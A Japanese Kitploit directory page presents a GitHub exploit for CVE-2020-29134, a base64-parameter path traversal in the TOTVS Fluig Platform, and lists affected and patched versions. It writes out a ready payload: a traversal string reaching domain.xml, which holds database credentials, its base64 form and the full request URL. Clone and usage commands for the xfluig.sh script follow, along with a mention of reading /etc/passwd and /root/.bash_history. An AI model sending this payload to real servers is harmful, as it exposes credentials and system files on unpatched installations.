Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2020-29134 — エクスプロイト CVE-2020-29134 - TOTVS Fluig Platform - パストラバーサル | Kitploit
ツール/GitHubGitHub/ls4ss/cve-2020-29134
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubls4ss/cve-2020-29134

CVE-2020-29134

エクスプロイト CVE-2020-29134 - TOTVS Fluig Platform - パストラバーサル

リポジトリを見る
313年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Totvs Fluig Platform

root@kitploit:~
 Fluigは、ERPシステムや企業の他のシステムと統合する、生産性とコラボレーションのためのプラットフォームであり、
 あなたとあなたのチームの働き方を革新します。

CVE-2020-29134

root@kitploit:~
 TOTVS Fluigプラットフォームは、base64でエンコードされたパラメータを介したパストラバーサルを許可します。
 この脆弱性が悪用されると、データベースへのアクセスデータを含む機密XMLファイルを読み取ることができ、
 場合によってはLDAP接続やERPシステム統合も可能になります。
 さらに、/etc/passwdや/root/.bash_historyなどのシステムファイルも探索できます。
 

影響を受けるバージョン

root@kitploit:~
--
<== Fluig Lake 1.7.0
<== Fluig 1.6.5
<== Fluig 1.6.4
...

パッチ適用済みバージョン

root@kitploit:~
<== Fluig Lake 1.7.0-210303 (Patched)
<== Fluig 1.6.5-210308 (Patched)
<== Fluig 1.6.4-210308 (Patched)

ペイロードの構築

alt text

攻撃ベクトル

root@kitploit:~
 http://fluig.host.com/volume/stream/Rmx1aWc=/

パストラバーサル(プレーンテキスト)

root@kitploit:~
 ?t=1&vol=Default&id=1&ver=1000&file=../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml

パストラバーサル(base64エンコード)

root@kitploit:~
 P3Q9MSZ2b2w9RGVmYXVsdCZpZD0xJnZlcj0xMDAwJmZpbGU9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZmx1aWcvYXBwc2VydmVyL2RvbWFpbi9jb25maWd1cmF0aW9uL2RvbWFpbi54bWw=

ペイロード

root@kitploit:~
 http://HOST.FLUIG.COM/volume/stream/Rmx1aWc=/P3Q9MSZ2b2w9RGVmYXVsdCZpZD0xJnZlcj0xMDAwJmZpbGU9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZmx1aWcvYXBwc2VydmVyL2RvbWFpbi9jb25maWd1cmF0aW9uL2RvbWFpbi54bWw=
 

Exploit-DB 参照

root@kitploit:~
 https://www.exploit-db.com/exploits/49622

 

リポジトリのクローン

root@kitploit:~
 # git clone https://github.com/lucxssouza/CVE-2020-29134.git
 # cd CVE-2020-29134
 # chmod +x xfluig.sh

使用方法

root@kitploit:~
 例1: ./xfluig.sh http://fluig.host.com REQUESTS_WFUZZ (wfuzzによって生成されるリクエスト数)

 例2: ./xfluig.sh http://fluig.host.com:PORT
ツールをダウンロード